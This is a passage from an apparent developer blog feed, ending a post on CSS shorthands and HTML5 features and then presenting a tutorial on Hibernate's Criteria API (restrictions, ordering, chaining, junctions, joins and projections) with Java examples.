<span id="cb11-5"><a aria-hidden="true" href="#cb11-5" tabindex="-1"></a> line-height<span class="in">:</span> 1<span class="fu">.5em</span>;</span></code></pre></div>
<p>can be written as:</p>
<div class="sourceCode" id="cb12"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb12-1"><a aria-hidden="true" href="#cb12-1" tabindex="-1"></a>font<span class="in">:</span> bold italic 1em/1<span class="fu">.5em</span> Arial<span class="op">,</span> Helvetica;</span></code></pre></div>
<h6 id="margin">margin</h6>
<p>The margin property is a shorthand for margin-top,
margin-right, margin-bottom and margin-left.</p>
<div class="sourceCode" id="cb13"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb13-1"><a aria-hidden="true" href="#cb13-1" tabindex="-1"></a> <span class="co">/* top=10px, right=5px, bottom=15px, left=20px */</span></span>
<span id="cb13-2"><a aria-hidden="true" href="#cb13-2" tabindex="-1"></a> margin<span class="in">:</span> 10px 5px 15px 20px;</span>
<span id="cb13-3"><a aria-hidden="true" href="#cb13-3" tabindex="-1"></a></span>
<span id="cb13-4"><a aria-hidden="true" href="#cb13-4" tabindex="-1"></a> <span class="co">/* top=10px, right=5px, bottom=10px, left=5px*/</span></span>
<span id="cb13-5"><a aria-hidden="true" href="#cb13-5" tabindex="-1"></a> margin<span class="in">:</span> 10px 5px;</span>
<span id="cb13-6"><a aria-hidden="true" href="#cb13-6" tabindex="-1"></a></span>
<span id="cb13-7"><a aria-hidden="true" href="#cb13-7" tabindex="-1"></a> <span class="co">/* top=10px, right=5px, bottom=15px, left=5px*/</span></span>
<span id="cb13-8"><a aria-hidden="true" href="#cb13-8" tabindex="-1"></a> margin<span class="in">:</span> 10px 5px 15px;</span></code></pre></div>
<h3 id="form-features-in-html5">Form features in HTML5</h3>
<ol type="1">
<li>Placeholder text</li>
<li>Slider control</li>
<li>Calendar/Date picker</li>
<li>autocomplete</li>
<li>Input type Search</li>
</ol>
<h3 id="css-features-in-html5">CSS features in HTML5</h3>
<ol type="1">
<li>Shadow - box shadow, text shadow</li>
<li>Gradient</li>
<li>Blur</li>
<li>column text</li>
<li>transform / transitions</li>
<li>Rounded corners (using border radius)</li>
<li>CSS Regions</li>
<li>Exclusions</li>
<li>Shaders</li>
<li>Shadow DOM</li>
<li>Multiple Images in background</li>
<li>Alpha</li>
<li>Font-faces</li>
<li>Animation using Keyframes</li>
<li><em>Position:fixed or other positioning important for animations to
work</em></li>
</ol>
<h3 id="new-tags-in-html5">New Tags in HTML5</h3>
<ol type="1">
<li>New semantic tags - header, footer, nav, section, aside,
article</li>
<li>Multimedia tags - audio/sound,video</li>
<li>Drawing based tags - canvas, svg</li>
<li>Form based new tags - Date, slider, time, spinner</li>
</ol>
<h3 id="important-links">Important Links</h3>
<ol type="1">
<li><a href="http://css3generator.com/">Css3Generator</a></li>
<li><a href="http://meyerweb.com/eric/tools/css/reset/">Reset</a></li>
<li><a href="http://vandelaydesign.com/blog/design/resources-grid-based-design/">Grid</a></li>
<li><a href="http://paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/">IE
support</a></li>
<li><a href="https://github.com/aFarkas/html5shiv">html5shiv</a></li>
<li><a href="http://modernizr.com/">Modernizr</a></li>
<li><a href="http://html5boilerplate.com/">html5boilerplate</a></li>
<li><a href="http://html.adobe.com/edge/inspect/">Adobe Inspect</a></li>
<li><a href="http://brackets.io/">Brackets</a></li>
</ol>Criteria API in Hibernate2008-05-30T00:00:00-07:002008-05-30T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2008-05-30:/posts/criteria-api-in-hibernate.htmlA post about the Criteria API available as part of the Hibernate API. This post also explores how to use the API to perform SQL operations in a more object-oriented manner.<h3 id="drawbacks-of-hql">Drawbacks of HQL</h3>
<p>Currently HQL (Hibernate Query Language) is used widely to query data
using Hibernate. However, there are many drawbacks such as:</p>
<ol type="1">
<li>SQL-like syntax and Non Extensible</li>
<li>Relational methodology instead of OO methodology</li>
<li>Problem in creating search queries on the fly</li>
<li>Complexity increases with number of variable conditions</li>
<li>Error-prone String concatenation</li>
<li>Direct use of query parameters in the query string</li>
</ol>
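<p>To make the string-concatenation drawback concrete, here is a rough
sketch in plain Java (no Hibernate involved). The class
<code>HqlConcatenation</code> and the helper <code>buildOrderQuery</code>
are hypothetical names; the point is only how much bookkeeping two optional
conditions already need.</p>

```java
class HqlConcatenation {
    // Hypothetical helper: builds an HQL string from two optional price bounds.
    // Either bound may be null, meaning "no restriction on that side".
    static String buildOrderQuery(Double lower, Double upper) {
        StringBuilder hql = new StringBuilder("select o from Order as o");
        boolean hasWhere = false;
        if (lower != null) {
            hql.append(" where o.priceTotal > :priceTotalLower");
            hasWhere = true;
        }
        if (upper != null) {
            // Forgetting this where/and switch yields an invalid query
            hql.append(hasWhere ? " and" : " where");
            hql.append(" o.priceTotal < :priceTotalUpper");
        }
        return hql.toString();
    }

    public static void main(String[] args) {
        System.out.println(buildOrderQuery(null, null));
        System.out.println(buildOrderQuery(10.0, null));
        System.out.println(buildOrderQuery(null, 20.0));
        System.out.println(buildOrderQuery(10.0, 20.0));
    }
}
```

<p>Every further optional condition adds another branch of this kind, and
the named parameters still have to be bound separately afterwards.</p>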
<p>A sample usage for HQL Query:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a><span class="bu">String</span> query <span class="op">=</span> <span class="st">"select o from Order as o join o.products as p where o.priceTotal > :priceTotalLower and o.priceTotal < :priceTotalUpper"</span><span class="op">;</span> </span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a><span class="bu">Query</span> q <span class="op">=</span> sess<span class="op">.</span><span class="fu">createQuery</span><span class="op">(</span>query<span class="op">);</span></span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a>q<span class="op">.</span><span class="fu">setDouble</span><span class="op">(</span><span class="st">"priceTotalLower"</span><span class="op">,</span> <span class="bu">Double</span><span class="op">.</span><span class="fu">parseDouble</span><span class="op">(</span>lower<span class="op">));</span></span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a>q<span class="op">.</span><span class="fu">setDouble</span><span class="op">(</span><span class="st">"priceTotalUpper"</span><span class="op">,</span><span class="bu">Double</span><span class="op">.</span><span class="fu">parseDouble</span><span class="op">(</span>upper<span class="op">));</span></span>
<span id="cb1-5"><a aria-hidden="true" href="#cb1-5" tabindex="-1"></a><span class="bu">List</span> list <span class="op">=</span> q<span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<p>With the Criteria API, the above query reduces to two simple lines
that are easier to read and understand.</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a><span class="bu">List</span> list <span class="op">=</span> sess<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Order<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
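<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a><span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">between</span><span class="op">(</span><span class="st">"priceTotal"</span><span class="op">,</span> <span class="bu">Double</span><span class="op">.</span><span class="fu">valueOf</span><span class="op">(</span>lower<span class="op">),</span> <span class="bu">Double</span><span class="op">.</span><span class="fu">valueOf</span><span class="op">(</span>upper<span class="op">))).</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>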
<p>In addition to conciseness and readability, the following are some of
the benefits of using the Criteria API:</p>
<ol type="1">
<li>Aspects of the relational approach</li>
<li>Reduces the complexity</li>
<li>Multi-criteria search functionalities</li>
<li>Building Hibernate Queries on the fly</li>
<li>Knowledge of SQL not necessary</li>
<li><strong>Extensible</strong> since it uses OO methodology</li>
<li><strong>Interoperable</strong> since it has provision for including
native SQL clauses also</li>
<li>Rich set of comparison operators</li>
<li>Business Objects as query parameters, without having to use primary
and foreign key references</li>
<li>Optimizing queries by providing various JOIN Strategies</li>
<li>Provides cleaner, clearer, more reliable and more maintainable
code.</li>
</ol>
<h3 id="what-is-criteria-api">What is Criteria API?</h3>
<p>There are five core components of the Criteria API.</p>
<ol type="1">
<li>Criteria</li>
<li>Criterion</li>
<li>Restrictions</li>
<li>Projection</li>
<li>Order</li>
</ol>
<p>The <code>Criteria</code> interface is the gateway to working with the
Criteria API. <code>Criterion</code> is the object-oriented representation
of a relational criterion. The <code>Restrictions</code> class provides the
built-in <code>Criterion</code> types. Essentially, <code>Restrictions</code>
is a factory for <code>Criterion</code> instances, and all of its methods
are static.</p>
<p>In Hibernate 2.x, the <code>Expression</code> class provided the services
that are now provided by the <code>Restrictions</code> class.
<code>Restrictions</code> provides almost all the required restrictions,
such as equals (<code>eq()</code>), logical and (<code>and()</code>) and
like (<code>like()</code>). Aggregation and grouping are provided by the
Projection class. The Order class represents the “order by” clause of
SQL.</p>
<h3 id="order-interface">Order Interface</h3>
<p>In HQL (and SQL), the order by clause allows you to order your query
results. With the Criteria API, this is done using the
<code>addOrder()</code> method and the Order class. The generated SQL lists
the order clauses in the sequence in which the Order objects were added to
the Criteria.</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb3-1"><a aria-hidden="true" href="#cb3-1" tabindex="-1"></a>Criteria crit <span class="op">=</span> session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Sale<span class="op">.</span><span class="fu">class</span><span class="op">)</span> <span class="op">;</span></span>
<span id="cb3-2"><a aria-hidden="true" href="#cb3-2" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">addOrder</span><span class="op">(</span> Order<span class="op">.</span><span class="fu">desc</span><span class="op">(</span><span class="st">"date"</span><span class="op">)</span> <span class="op">);</span></span>
<span id="cb3-3"><a aria-hidden="true" href="#cb3-3" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">addOrder</span><span class="op">(</span> Order<span class="op">.</span><span class="fu">asc</span><span class="op">(</span><span class="st">"product.number"</span><span class="op">)</span> <span class="op">);</span></span></code></pre></div>
<h3 id="simple-criteria-query">Simple Criteria Query</h3>
<p>The following code shows how a simple Criteria query is built.</p>
<ol type="1">
<li>It selects the Insurance Object</li>
<li>Includes a Where clause insurance name like ‘%a%’</li>
<li>Includes another Where clause: investAmount value between 1000
and 2500 inclusive</li>
<li>Sets the maximum number of results to 5</li>
</ol>
<div class="sourceCode" id="cb4"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb4-1"><a aria-hidden="true" href="#cb4-1" tabindex="-1"></a>session <span class="op">=</span> sessionFactory<span class="op">.</span><span class="fu">openSession</span><span class="op">();</span></span>
<span id="cb4-2"><a aria-hidden="true" href="#cb4-2" tabindex="-1"></a>Criteria crit <span class="op">=</span> session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Insurance<span class="op">.</span><span class="fu">class</span><span class="op">);</span></span>
<span id="cb4-3"><a aria-hidden="true" href="#cb4-3" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">like</span><span class="op">(</span><span class="st">"insuranceName"</span><span class="op">,</span> <span class="st">"%a%"</span><span class="op">));</span> </span>
<span id="cb4-4"><a aria-hidden="true" href="#cb4-4" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">add</span><span class="op">(</span><span class="bu">Expression</span><span class="op">.</span><span class="fu">between</span><span class="op">(</span><span class="st">"investAmount"</span><span class="op">,</span> <span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">1000</span><span class="op">),</span><span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">2500</span><span class="op">)));</span> </span>
<span id="cb4-5"><a aria-hidden="true" href="#cb4-5" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">setMaxResults</span><span class="op">(</span><span class="dv">5</span><span class="op">);</span> </span>
<span id="cb4-6"><a aria-hidden="true" href="#cb4-6" tabindex="-1"></a><span class="bu">List</span> insurances <span class="op">=</span> crit<span class="op">.</span><span class="fu">list</span><span class="op">();</span></span>
<span id="cb4-7"><a aria-hidden="true" href="#cb4-7" tabindex="-1"></a><span class="cf">for</span><span class="op">(</span><span class="bu">Iterator</span> it <span class="op">=</span>insurances<span class="op">.</span><span class="fu">iterator</span><span class="op">();</span>it<span class="op">.</span><span class="fu">hasNext</span><span class="op">();){</span></span>
<span id="cb4-8"><a aria-hidden="true" href="#cb4-8" tabindex="-1"></a> Insurance insurance <span class="op">=</span> <span class="op">(</span>Insurance<span class="op">)</span> it<span class="op">.</span><span class="fu">next</span><span class="op">();</span></span>
<span id="cb4-9"><a aria-hidden="true" href="#cb4-9" tabindex="-1"></a> <span class="bu">System</span><span class="op">.</span><span class="fu">out</span><span class="op">.</span><span class="fu">println</span><span class="op">(</span><span class="st">"ID: "</span> <span class="op">+</span> insurance<span class="op">.</span><span class="fu">getLngInsuranceId</span><span class="op">());</span></span>
<span id="cb4-10"><a aria-hidden="true" href="#cb4-10" tabindex="-1"></a> <span class="bu">System</span><span class="op">.</span><span class="fu">out</span><span class="op">.</span><span class="fu">println</span><span class="op">(</span><span class="st">"Name: "</span> <span class="op">+</span> insurance<span class="op">.</span><span class="fu">getInsuranceName</span><span class="op">());</span></span>
<span id="cb4-11"><a aria-hidden="true" href="#cb4-11" tabindex="-1"></a> <span class="bu">System</span><span class="op">.</span><span class="fu">out</span><span class="op">.</span><span class="fu">println</span><span class="op">(</span><span class="st">"Amount: "</span> <span class="op">+</span> insurance<span class="op">.</span><span class="fu">getInvestAmount</span><span class="op">());</span></span>
<span id="cb4-12"><a aria-hidden="true" href="#cb4-12" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<h3 id="criterion-chaining">Criterion Chaining</h3>
<p>Chaining is a popular way of adding Restrictions, Expressions,
Projections and Order objects without creating intermediate variables.
It is particularly useful when extensible Criteria objects need to be
passed between methods.</p>
<div class="sourceCode" id="cb5"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb5-1"><a aria-hidden="true" href="#cb5-1" tabindex="-1"></a><span class="bu">List</span> sales <span class="op">=</span> session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Sale<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb5-2"><a aria-hidden="true" href="#cb5-2" tabindex="-1"></a> <span class="op">.</span><span class="fu">add</span><span class="op">(</span><span class="bu">Expression</span><span class="op">.</span><span class="fu">ge</span><span class="op">(</span><span class="st">"date"</span><span class="op">,</span>startDate<span class="op">))</span></span>
<span id="cb5-3"><a aria-hidden="true" href="#cb5-3" tabindex="-1"></a> <span class="op">.</span><span class="fu">add</span><span class="op">(</span><span class="bu">Expression</span><span class="op">.</span><span class="fu">le</span><span class="op">(</span><span class="st">"date"</span><span class="op">,</span>endDate<span class="op">))</span></span>
<span id="cb5-4"><a aria-hidden="true" href="#cb5-4" tabindex="-1"></a> <span class="op">.</span><span class="fu">addOrder</span><span class="op">(</span> Order<span class="op">.</span><span class="fu">asc</span><span class="op">(</span><span class="st">"date"</span><span class="op">)</span> <span class="op">)</span></span>
<span id="cb5-5"><a aria-hidden="true" href="#cb5-5" tabindex="-1"></a> <span class="op">.</span><span class="fu">setFirstResult</span><span class="op">(</span><span class="dv">0</span><span class="op">)</span></span>
<span id="cb5-6"><a aria-hidden="true" href="#cb5-6" tabindex="-1"></a> <span class="op">.</span><span class="fu">setMaxResults</span><span class="op">(</span><span class="dv">10</span><span class="op">)</span></span>
<span id="cb5-7"><a aria-hidden="true" href="#cb5-7" tabindex="-1"></a> <span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<h3 id="restriction-for-where-property">Restriction for WHERE
property</h3>
<p>WHERE clauses that compare one property with another can be added via
<code>Restrictions.eqProperty()</code>,
<code>Restrictions.neProperty()</code>,
<code>Restrictions.leProperty()</code> and
<code>Restrictions.geProperty()</code></p>
<div class="sourceCode" id="cb6"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb6-1"><a aria-hidden="true" href="#cb6-1" tabindex="-1"></a><span class="co">// Adds a WHERE Clause for comparing two columns,</span></span>
<span id="cb6-2"><a aria-hidden="true" href="#cb6-2" tabindex="-1"></a>session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Sale<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb6-3"><a aria-hidden="true" href="#cb6-3" tabindex="-1"></a> <span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">eqProperty</span><span class="op">(</span><span class="st">"saleDate"</span><span class="op">,</span><span class="st">"releaseDate"</span><span class="op">))</span></span>
<span id="cb6-4"><a aria-hidden="true" href="#cb6-4" tabindex="-1"></a> <span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<p>Custom native SQL restrictions can still be added using
<code>Restrictions.sqlRestriction()</code></p>
<div class="sourceCode" id="cb7"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb7-1"><a aria-hidden="true" href="#cb7-1" tabindex="-1"></a><span class="co">// Adds a native SQL Restriction in the WHERE Clause</span></span>
<span id="cb7-2"><a aria-hidden="true" href="#cb7-2" tabindex="-1"></a>sess<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Cat<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb7-3"><a aria-hidden="true" href="#cb7-3" tabindex="-1"></a><span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">sqlRestriction</span><span class="op">(</span><span class="st">"lower({alias}.name) like lower(?)"</span><span class="op">,</span> <span class="st">"Fritz%"</span><span class="op">,</span>Hibernate<span class="op">.</span><span class="fu">STRING</span><span class="op">)</span> <span class="op">)</span> <span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<p><em>All the static methods available in Restrictions are also
available in the Expression API. It also contains methods such as
<code>ilike()</code>, which applies lower(columnname) in the query for a
case-insensitive match.</em></p>
<h3 id="disjunction-and-conjunction">Disjunction and Conjunction:</h3>
<p>Disjunction and Conjunction make complex search criteria simple to
develop and maintain.</p>
<p><strong>Disjunction</strong> indicates a group of Criterion to be
<strong>ORed</strong></p>
<div class="sourceCode" id="cb8"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb8-1"><a aria-hidden="true" href="#cb8-1" tabindex="-1"></a>Disjunction disList <span class="op">=</span> Restrictions<span class="op">.</span><span class="fu">disjunction</span><span class="op">();</span></span>
<span id="cb8-2"><a aria-hidden="true" href="#cb8-2" tabindex="-1"></a>disList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">eq</span><span class="op">(</span><span class="st">"id"</span><span class="op">,</span><span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">1</span><span class="op">)));</span></span>
<span id="cb8-3"><a aria-hidden="true" href="#cb8-3" tabindex="-1"></a>disList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">eq</span><span class="op">(</span><span class="st">"id"</span><span class="op">,</span><span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">2</span><span class="op">)));</span></span>
<span id="cb8-4"><a aria-hidden="true" href="#cb8-4" tabindex="-1"></a>sess<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Cat<span class="op">.</span><span class="fu">class</span><span class="op">)</span> <span class="op">.</span><span class="fu">add</span><span class="op">(</span>disList<span class="op">);</span></span>
<span id="cb8-5"><a aria-hidden="true" href="#cb8-5" tabindex="-1"></a><span class="co">// This gives the WHERE Clause WHERE (id=1 OR id=2)</span></span></code></pre></div>
<p><strong>Conjunction</strong> indicates a group of Criterion to be
<strong>ANDed</strong></p>
<div class="sourceCode" id="cb9"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb9-1"><a aria-hidden="true" href="#cb9-1" tabindex="-1"></a>Conjunction conList <span class="op">=</span> Restrictions<span class="op">.</span><span class="fu">conjunction</span><span class="op">();</span></span>
<span id="cb9-2"><a aria-hidden="true" href="#cb9-2" tabindex="-1"></a>conList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">eq</span><span class="op">(</span><span class="st">"id"</span><span class="op">,</span><span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">1</span><span class="op">)));</span></span>
<span id="cb9-3"><a aria-hidden="true" href="#cb9-3" tabindex="-1"></a>conList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">eq</span><span class="op">(</span><span class="st">"id"</span><span class="op">,</span><span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">2</span><span class="op">)));</span></span>
<span id="cb9-4"><a aria-hidden="true" href="#cb9-4" tabindex="-1"></a>sess<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Cat<span class="op">.</span><span class="fu">class</span><span class="op">)</span> <span class="op">.</span><span class="fu">add</span><span class="op">(</span>conList<span class="op">);</span></span>
<span id="cb9-5"><a aria-hidden="true" href="#cb9-5" tabindex="-1"></a><span class="co">// This gives the WHERE Clause WHERE (id=1 AND id=2)</span></span></code></pre></div>
<p><em>Disjunctions and Conjunctions can also be nested, and combined
with other groups of Restrictions.</em></p>
<div class="sourceCode" id="cb10"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb10-1"><a aria-hidden="true" href="#cb10-1" tabindex="-1"></a>Conjunction conList <span class="op">=</span> Restrictions<span class="op">.</span><span class="fu">conjunction</span><span class="op">();</span></span>
<span id="cb10-2"><a aria-hidden="true" href="#cb10-2" tabindex="-1"></a>conList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">disjunction</span><span class="op">()</span></span>
<span id="cb10-3"><a aria-hidden="true" href="#cb10-3" tabindex="-1"></a> <span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">eq</span><span class="op">(</span><span class="st">"id"</span><span class="op">,</span><span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">1</span><span class="op">))));</span></span></code></pre></div>
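<p>To make the nesting concrete, here is a minimal sketch of how nested
AND/OR groups could be rendered into a WHERE clause. It is a toy model
only: <code>JunctionSketch</code>, <code>Node</code>, <code>Eq</code> and
<code>Junction</code> are hypothetical names invented for this
illustration, not Hibernate classes, and the SQL that Hibernate actually
generates may be formatted differently.</p>

```java
import java.util.ArrayList;
import java.util.List;

// Toy model only: these classes are hypothetical and are NOT Hibernate's API.
// They mimic how nested AND/OR groups could be rendered into a WHERE clause.
public class JunctionSketch {

    interface Node {
        String toSql();
    }

    // A leaf condition such as id=1
    static final class Eq implements Node {
        private final String property;
        private final Object value;

        Eq(String property, Object value) {
            this.property = property;
            this.value = value;
        }

        public String toSql() {
            return property + "=" + value;
        }
    }

    // A group of nodes joined by a single operator ("AND" or "OR")
    static final class Junction implements Node {
        private final String op;
        private final List<Node> parts = new ArrayList<>();

        Junction(String op) {
            this.op = op;
        }

        // Returns this so that calls can be chained, as in the Criteria examples
        Junction add(Node node) {
            parts.add(node);
            return this;
        }

        public String toSql() {
            List<String> rendered = new ArrayList<>();
            for (Node node : parts) {
                rendered.add(node.toSql());
            }
            return "(" + String.join(" " + op + " ", rendered) + ")";
        }
    }

    static Junction conjunction() {
        return new Junction("AND");
    }

    static Junction disjunction() {
        return new Junction("OR");
    }

    // An OR group nested inside an AND group
    static String example() {
        return conjunction()
            .add(disjunction().add(new Eq("id", 1)).add(new Eq("id", 2)))
            .add(new Eq("color", "'black'"))
            .toSql();
    }

    public static void main(String[] args) {
        // prints: WHERE ((id=1 OR id=2) AND color='black')
        System.out.println("WHERE " + example());
    }
}
```

<p>Each group wraps its children in parentheses, so the inner OR keeps
its precedence no matter how deeply it is nested.</p>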
<h3 id="how-to-join-tables-using-criteria-api">How to join Tables using
Criteria API</h3>
<p>In HQL, joins closely resemble SQL.</p>
<pre><code>// use LEFT JOIN FETCH for optimizing queries
from Sale sale left join fetch sale.product where sale.date > :startDate</code></pre>
<p>The same can be achieved with the Criteria API using
<code>setFetchMode()</code>:</p>
<div class="sourceCode" id="cb12"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb12-1"><a aria-hidden="true" href="#cb12-1" tabindex="-1"></a>session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Sale<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb12-2"><a aria-hidden="true" href="#cb12-2" tabindex="-1"></a> <span class="op">.</span><span class="fu">setFetchMode</span><span class="op">(</span><span class="st">"product"</span><span class="op">,</span>FetchMode<span class="op">.</span><span class="fu">EAGER</span><span class="op">)</span></span>
<span id="cb12-3"><a aria-hidden="true" href="#cb12-3" tabindex="-1"></a> <span class="op">.</span><span class="fu">setFetchMode</span><span class="op">(</span><span class="st">"category"</span><span class="op">,</span>FetchMode<span class="op">.</span><span class="fu">EAGER</span><span class="op">)</span></span>
<span id="cb12-4"><a aria-hidden="true" href="#cb12-4" tabindex="-1"></a> <span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<p>With the Criteria API, <strong>Restrictions</strong> can also be applied
to the joined tables. The Criteria API uses <code>createCriteria()</code> or
<code>createAlias()</code> (which does not create a new Criteria instance)
to create an inner join between the two tables.</p>
<div class="sourceCode" id="cb13"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb13-1"><a aria-hidden="true" href="#cb13-1" tabindex="-1"></a><span class="co">// to find all the shirt models with sizes over 40.</span></span>
<span id="cb13-2"><a aria-hidden="true" href="#cb13-2" tabindex="-1"></a><span class="co">// HQL: from Shirt shirt join shirt.availableSizes size where size.number > 40</span></span>
<span id="cb13-3"><a aria-hidden="true" href="#cb13-3" tabindex="-1"></a></span>
<span id="cb13-4"><a aria-hidden="true" href="#cb13-4" tabindex="-1"></a>session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Shirt<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb13-5"><a aria-hidden="true" href="#cb13-5" tabindex="-1"></a> <span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span><span class="st">"availableSizes"</span><span class="op">)</span></span>
<span id="cb13-6"><a aria-hidden="true" href="#cb13-6" tabindex="-1"></a> <span class="op">.</span><span class="fu">add</span><span class="op">(</span><span class="bu">Expression</span><span class="op">.</span><span class="fu">gt</span><span class="op">(</span><span class="st">"number"</span><span class="op">,</span> <span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">40</span><span class="op">)))</span></span>
<span id="cb13-7"><a aria-hidden="true" href="#cb13-7" tabindex="-1"></a> <span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<h3 id="projections---aggregation-and-grouping">Projections -
Aggregation and Grouping</h3>
<p>The Projections API is used for aggregation and grouping. The
following simple example returns the number of cats with an age greater
than 10.</p>
<div class="sourceCode" id="cb14"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb14-1"><a aria-hidden="true" href="#cb14-1" tabindex="-1"></a><span class="co">// Simple Projection</span></span>
<span id="cb14-2"><a aria-hidden="true" href="#cb14-2" tabindex="-1"></a>session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Cat<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb14-3"><a aria-hidden="true" href="#cb14-3" tabindex="-1"></a> <span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">gt</span><span class="op">(</span><span class="st">"age"</span><span class="op">,</span> <span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">10</span><span class="op">)))</span></span>
<span id="cb14-4"><a aria-hidden="true" href="#cb14-4" tabindex="-1"></a> <span class="op">.</span><span class="fu">setProjection</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">rowCount</span><span class="op">())</span></span>
<span id="cb14-5"><a aria-hidden="true" href="#cb14-5" tabindex="-1"></a> <span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<p>Several aggregations can be combined in a single Criteria, optionally
together with a group-by clause.</p>
<div class="sourceCode" id="cb15"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb15-1"><a aria-hidden="true" href="#cb15-1" tabindex="-1"></a>Criteria crit <span class="op">=</span> session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Cat<span class="op">.</span><span class="fu">class</span><span class="op">);</span></span>
<span id="cb15-2"><a aria-hidden="true" href="#cb15-2" tabindex="-1"></a>ProjectionList projList <span class="op">=</span> Projections<span class="op">.</span><span class="fu">projectionList</span><span class="op">();</span></span>
<span id="cb15-3"><a aria-hidden="true" href="#cb15-3" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">rowCount</span><span class="op">());</span></span>
<span id="cb15-4"><a aria-hidden="true" href="#cb15-4" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">avg</span><span class="op">(</span><span class="st">"weight"</span><span class="op">));</span></span>
<span id="cb15-5"><a aria-hidden="true" href="#cb15-5" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">max</span><span class="op">(</span><span class="st">"weight"</span><span class="op">));</span></span>
